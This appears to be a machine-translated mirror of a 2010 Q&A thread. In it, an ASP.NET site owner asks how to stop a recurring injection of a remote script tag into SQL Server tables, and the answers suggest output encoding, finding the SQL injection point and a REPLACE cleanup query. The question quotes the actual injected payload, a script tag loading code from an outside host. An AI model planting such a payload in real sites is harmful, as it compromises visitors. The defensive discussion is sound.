ASP.NET网站上的XSS攻击

时间:2010-09-23 06:38:35

标签: asp.net sql-server sql-injection

我遇到了很大麻烦。请帮忙!!!!!!!!!!

我的网站遭到某些恶意脚本的攻击< / title> < script src = http:// google-stats50.info/ur.php>。此脚本会自动附加到某个表的任何列。我删除了这个脚本。但几个小时后,它又重新出现在一些表格中。但这一次是< / title> < script src = http:// google-stats49.info/ur.php>。

我的客户抱怨脚本。使用的技术是ASP.NET 1.1,SQL SERVER 2005。

请帮忙。

提前致谢!!!!!!

5 个答案:

答案 0 :(得分:4)

从数据库呈现文本时,可以使用两种方法来避免使用此脚本。

  1. 用户Server.HtmlEncode(DataFromDatabase);
  2. 使用具有类似功能的 Microsoft Anti-Cross dll library和更多选项。
  3. Last MS Anti-XSS library now是3.1 How to using video

    他们如何通过此脚本。

    1. 在联系方式或其他表格上。
    2. 关于统计信息的浏览器参考以及浏览站点的时间,您会保留一个日志,当您看到此日志时脚本正在运行。
    3. 希望得到这个帮助。

答案 1 :(得分:2)

关闭网站。您的服务器现在可能会或可能不会被搞砸。

您必须找出更改的来源 - 数据库或文件系统

如果它是数据库,那么你可能没问题,有人可能正在使用sql注入。设置权限,以便在找到SQL INJECTION点之前,网站暂时无法更新数据库。

如果是您的文件系统,那么您可能需要清除并重置该站点。他们在,你不会摆脱他们。找到你的切入点,但这很难。

答案 2 :(得分:0)

我建议您删除IRIS中的所有外部主机头绑定。这使您可以在本地找到问题,而您的任何客户端都不会被感染/被盗

答案 3 :(得分:0)

快速补救

以下不是解决方案,但通过此方法,您可以在单个查询中从数据库中删除脚本。这就是我现在所做的事情:)。


更新Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)),'http://google-stats49.info/ur.php>','')


这个就像查找和替换单词中的内容一样。如果您发现有关病毒脚本的任何商品,请在此处发布。

此致 马苏德

答案 4 :(得分:0)

同样的问题在这里...它开始于大约15.30并且感染了4个表...这里是完整数据库搜索的解决方案:http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html只需编辑它以返回不同的表名。

这将作为马苏德提及

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '')